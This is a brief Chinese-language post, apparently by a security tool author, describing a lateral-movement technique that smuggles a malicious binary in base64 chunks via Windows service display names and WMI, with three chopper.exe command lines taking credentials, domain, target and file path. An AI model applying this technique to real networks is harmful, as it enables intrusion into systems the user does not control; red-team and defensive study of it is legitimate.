我最近发现了一项新技术,并给它取了个昵称(Chop chop),用于通过 Windows 服务的显示名称和 WMI 进行横向移动,方法是将恶意二进制文件以 base64 块的形式走私,并使用 TChopper 工具自动化该过程。
image
如果你使用 WMI 技术进行横向移动,你也可以使用 Chopper 来完成
image
# chop chop 模式
chopper.exe -s -u 用户名 -p 密码 -d 域名 -f 本地二进制文件路径
# chop chop 完成
chopper.exe -m -u 用户名 -p 密码 -d 域名 -f 本地二进制文件路径
# 使用 WMI 进行走私
chopper.exe -w -u 域名\用户名 -p 密码 -t 目标机器 -f 本地二进制文件路径
我为开源社区创建了安全工具,请支持我 https://paypal.me/0xsp